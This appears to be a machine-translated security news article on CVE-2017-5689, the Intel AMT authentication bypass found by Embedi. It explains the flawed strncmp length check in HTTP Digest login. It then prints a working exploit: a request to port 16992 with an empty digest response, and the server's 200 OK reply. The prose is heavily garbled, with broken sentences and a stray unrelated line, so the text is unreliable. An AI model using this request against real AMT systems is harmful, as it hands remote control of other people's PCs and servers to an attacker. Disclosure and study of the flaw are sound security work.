Earlier this week, Intel released a high-risk mention the right vulnerability, the impact of the range including the past 7 years Intel Server chip remote management capabilities. A remote attacker can exploit the vulnerability control there PC's, laptops and servers. This vulnerability number CVE-2017-5689, can affect to the Intel remote management technologies, including Active Management Technology (AMT), Intel Standard Manageability(ISM)Intel Small Business Technology (SBT)software version number from 6 to 11. 6 in. If you see these signs, then you most likely caught. !
Vulnerability first by Embedi research team MaksimMalyutin in mid-February found that after the discovery he immediately submitted to the Intel security team. Now most system administrators have been through the patches to update the system, Embedi decided to disclose more details. Hackers to by sending an empty authentication string to hijack the use of the Intel chip computers, in understand the principles before we have to answer the following questions: What is Intel AMT for? Intel AMT vulnerabilities appear? Hackers how to take advantage of this vulnerability? What is Intel AMT for? Intel's chip embedded with Intel Active Management Technology(AMT)technology, this technology will allow IT managers to remotely manage and repair PCS, workstations and servers. This item is a preset function using the Web-based control page, through the remote port 16992 and 16993 allow administrators to remotely manage the system. Intel AMT Web interface can even in system shutdown to run, because it is integrated in the chip, so can be independent of theoperating systemoperation, as long as the machine connected to the power supply and network cable. Intel AMT vulnerabilities appear? In order to prevent the function is not an authorized user abuse, AMT service will use HTTP Digest authentication, and Kerberos authentication mechanisms. Elevation of Privilege vulnerabilities will appear in the Intel AMT Web interface is by HTTP Digest authentication Protocol to authenticate the user of the link, which is based on challenge/response(Challenge/Response)authentication system. In the interpretation of the vulnerability prior to our first look at a digest authentication principle, the summary of the certification includes the following steps: The user to initiate a no certificate login request, as a response, the server replies with a random number called”nonce“, the HTTP method and the requested URI. Next, the user will be prompted to enter a user name and password. After the input, the client will send an encrypted string(user_response), the string is to use a one-way encryption function to generate a message summary, message digest, and the Summary by user name, password, the given nonce value, the HTTP method and the requested URI is generated. While the server side will be through the database in the user name and password to calculate a similar encrypted string(computed_response)。 The server uses the strncmp()function on the two strings are compared, if both matches it will let users log in the Intel AMT Web interface. While Intel AMT vulnerability appears in the strncmp()function. Syntax: strncmp (string_1, string_2 , length) Wherein the length parameter defines how many characters will be compared Strncmp()is a binary safe string comparison function, the so-called binary safe refers to the in a binary file on the execution does not change the contents of the file function or operation, which is essentially the operation input as the original, without any special format, meaning the data stream. The function's return value includes the negative integers, 0 and positive integer, depending on the string_1 is greater than string_2, if both are equal, 0 is returned. There is a problem of code: if(strncmp(computed_response, user_response, response_length)) exit(0x99); Obviously, to the authentication is successful, the variable user_response value must be equal to computed_response, so no matter how the length, the strncmp()function the return value must be 0. But to write this piece of code the programmer incorrectly. user_response length to strncmp()function, and the non-computed_response it. Hack how to use? To exploit the vulnerability, an unauthorized user only needs to send empty user_response value. Since strncmp()incorrectly with user_response variables to authenticate the user, therefore, to send a null value would make the comparison very well. think user_response with computed_response equal, so pass validation. Attack example: GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale=false,qop="auth" Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c" HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:09:17 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6 Vulnerability hazard The attacker can also use the Keyboard Video Mouse (KVM)functions, this function is built-in Intel AMT Web Control platform, the KVM allows system administrators remote control system, capable of performing operations comprising: “[The attacker]can be remote loaded to execute arbitrary programs, read and write files using a conventional file Manager”, the researchers in the paper wrote,“using the IDE-R (IDERedirection), the hacker can also remotely change the boot device, such as a. other virtual images as the boot device.”